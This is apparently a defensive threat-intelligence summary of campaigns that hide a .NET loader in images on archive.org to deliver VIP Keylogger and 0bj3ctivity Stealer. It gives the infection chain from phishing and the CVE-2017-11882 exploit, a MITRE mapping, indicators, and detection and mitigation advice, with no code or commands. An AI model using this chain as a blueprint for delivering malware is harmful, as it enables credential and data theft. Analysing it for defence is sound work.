Full Report
Threat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. "In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads," HP Wolf Security said in its Threat Insights Report
Analysis Summary
# Tool/Technique: VIP Keylogger and 0bj3ctivity Stealer via Image Steganography
## Overview
This analysis summarizes the deployment techniques used by threat actors to deliver two distinct malware payloads, **VIP Keylogger** and the **0bj3ctivity** stealer, by concealing malicious code within image files hosted on archive\[.\]org. The attack chain relies on initial phishing, exploitation of a known vulnerability, and the use of a shared .NET loader.
## Technical Details
- Type: Malware (Keylogger & Information Stealer) / Delivery Technique
- Platform: Windows (Inferred from VBScript/PowerShell execution and common office document exploitation)
- Capabilities: Data exfiltration (keystrokes, clipboard, screenshots, credentials), remote code execution via steganography/loader.
- First Seen: Q3 2024 (Based on HP Wolf Security Report timeframe)
## MITRE ATT&CK Mapping
The primary focus is on initial compromise, execution, and defense evasion via file manipulation.
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Using Excel documents disguised as invoices/POs)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (PowerShell execution)
- T1204 - User Execution
- T1204.002 - Malicious File
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Base64 decoding, code hidden in images)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (Implied C2 for payload delivery)
*(Note: Specific technique IDs for the Equation Editor exploit (CVE-2017-11882) would fall under T1190 - Exploit Public-Facing Application or T1203 - Exploitation for Client Execution, but the article highlights the vulnerability exploitation as the initial step.)*
## Functionality
### Core Capabilities
- **Initial Infection Vector:** Phishing emails delivering malicious Microsoft Excel documents.
- **Exploitation:** Leveraging **CVE-2017-11882** (Equation Editor vulnerability) to download a VBScript file.
- **Loader Execution:** VBScript decodes and runs a PowerShell script.
- **Image Retrieval & Decoding:** PowerShell downloads an image (posted to archive\[.\]org), parses **Base64-encoded code** hidden within it, and decodes it into a .NET executable loader.
- **Payload Delivery:** The .NET loader downloads and executes either **VIP Keylogger** or **0bj3ctivity Stealer**.
### Advanced Features
- **Steganography/File Hiding:** Malicious payload fragments are hidden within innocuous image files, fetched remotely, significantly lowering the immediate visibility of the payload file itself.
- **Shared Loader:** Both campaigns appear to utilize the *same* .NET loader, suggesting the use of interchangeable malware kits.
- **VIP Keylogger Functions:** Steals keystrokes, clipboard content, screenshots, and credentials.
- **Alternative Entry Point:** One variant uses malicious archives containing a JavaScript file, which launches the PowerShell script instead of an Excel macro exploiting CVE-2017-11882.
## Indicators of Compromise
The article primarily describes the *methodology* rather than listing specific artifacts for the final malware, focusing instead on the infrastructure used to host the steganographic images.
- File Hashes: [Not provided in the text]
- File Names: [Inferred: Malicious Microsoft Excel documents, VBScript files, PowerShell scripts, JavaScript files]
- Registry Keys: [Not provided in the text]
- Network Indicators:
- Stage 1: Download source for VBScript/archive content (Implied sender domain/IP of phishing email).
- Stage 2: Image hosted at: `archive[.]org` (Defanged)
- Stage 3: Download URL for VIP Keylogger payload (Not specified).
- Behavioral Indicators:
- Execution chain: Excel/JS $\rightarrow$ VBScript $\rightarrow$ PowerShell $\rightarrow$ Image download $\rightarrow$ .NET execution.
- Use of `CVE-2017-11882` exploitation chain.
## Associated Threat Actors
- [Not explicitly named in the text, but are leveraging sophisticated malware kits for efficiency.]
## Detection Methods
- Signature-based detection: Signatures required for the specific .NET loader, VIP Keylogger, and 0bj3ctivity Stealer binaries.
- Behavioral detection: Detection of unusual PowerShell execution retrieving remote files, especially scripts that parse image files for encoded content. Monitoring the exploitation attempts associated with Equation Editor (MS Office interaction leading to script execution).
- YARA rules: [Not provided in the text, but rules targeting the specific .NET loader assembly structure would be beneficial.]
## Mitigation Strategies
- Prevention measures: Implement multi-factor authentication (MFA) universally. Strictly enforce email filtering rules to block suspicious attachments (especially documents linking to script downloads).
- Hardening recommendations: Patching all systems against **CVE-2017-11882** (though this is an older MS Office vulnerability, ensuring patches are current is critical). Disable or restrict execution of scripts (VBScript, PowerShell) by non-administrative users or apply application control whitelisting.
## Related Tools/Techniques
- Snake Keylogger (Shares functional overlap with VIP Keylogger)
- 404 Keylogger (Shares functional overlap with VIP Keylogger)
- HTML Smuggling (Mentioned as another technique observed by the reporting vendor)
- Steganography (General technique used for file hiding)